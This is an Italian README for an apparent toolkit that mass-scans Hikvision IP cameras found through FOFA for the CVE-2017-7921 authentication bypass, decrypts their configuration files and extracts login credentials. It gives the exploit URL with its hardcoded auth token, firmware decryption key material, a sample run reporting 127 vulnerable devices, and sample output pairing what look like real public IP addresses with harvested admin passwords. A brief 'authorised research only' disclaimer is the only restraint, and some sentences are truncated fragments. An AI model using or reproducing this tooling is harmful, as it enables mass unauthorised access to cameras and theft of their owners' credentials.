
Utilizzato per testare rapidamente la vulnerabilità CVE-2017-7921 di Hikvision tramite FOFA, fornendo le credenziali di login e generando un file JSON.
Dichiarazione di sicurezza: questo strumento è destinato esclusivamente a ricerche di sicurezza autorizzate e alla verifica delle vulnerabilità.
Nota importante: utilizzando questo strumento, accetti i seguenti termini
Questo progetto segue la Policy sulla sicurezza informatica di GitHub e le linee guida per la divulgazione del Centro di risposta alla sicurezza di Hikvision.
Strumento di scansione e verifica batch per la vulnerabilità di bypass dell'autenticazione CVE-2017-7921 nelle telecamere IP Hikvision, con supporto per la decrittazione automatica dei file di configurazione e l'estrazione delle credenziali.
git clone https://github.com/[tuo_username]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0
Nella directory dello strumento, crea la cartella zc/ e inserisci l'elenco dei dispositivi in formato JSON (un oggetto dispositivo per riga):
mkdir zc
Esempio di file: devices_2025.json
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
Descrizione dei campi:
python batch_decrypt.py
════════════════════════════════════════════════════════════════════════════════
Strumento di scansione batch delle vulnerabilità dei file di configurazione delle telecamere Hikvision
════════════════════════════════════════════════════════════════════════════════
File JSON disponibili:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45.678 byte)
════════════════════════════════════════════════════════════════════════════════
Seleziona il numero del file: 1
File selezionato: devices_2025.json
Caricamento dati dei dispositivi in corso...
Numero totale di dispositivi da scansionare: 2000
Inserisci il numero di thread concorrenti (default: 5): 10
Thread concorrenti: 10
Avvio scansione...
Dispositivi scansionati totali: 2000
Dispositivi vulnerabili trovati: 127
Dispositivi vulnerabili salvati in: vulnerable_devices.json
Al termine della scansione viene generato il file vulnerable_devices.json, contenente le informazioni di tutti i dispositivi vulnerabili.
Esempio di output:
[
{
"url": "http://109.50.152.186",
"config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
"username": "admin",
"password": "123456",
"city": "Lisbon",
"country": "PT",
"org": "ISP Telecom",
"status": "success"
}
]
/System/configurationFile?auth=YWRtaW46MTEK utilizza credenziali hardcoded.279977f62f6cfd2d91cd75b889ce0c9a è hardcodata nel firmware.0x73, 0x8B, 0x55, 0x44).Questo software è destinato esclusivamente a scopi di ricerca di sicurezza autorizzata e formazione. L'utente è tenuto a garantire la conformità a tutte le leggi applicabili.
Ultimo aggiornamento: 2025-01-29 | Versione: v1.0.0 | CVE supportato: CVE-2017-7921
| Campo | Descrizione | Obbligatorio |
|---|
link | Indirizzo HTTP/HTTPS del dispositivo | ✅ Sì |
city | Informazioni sulla città | ❌ No |
country | Codice paese | ❌ No |
org | Organizzazione/ISP | ❌ No |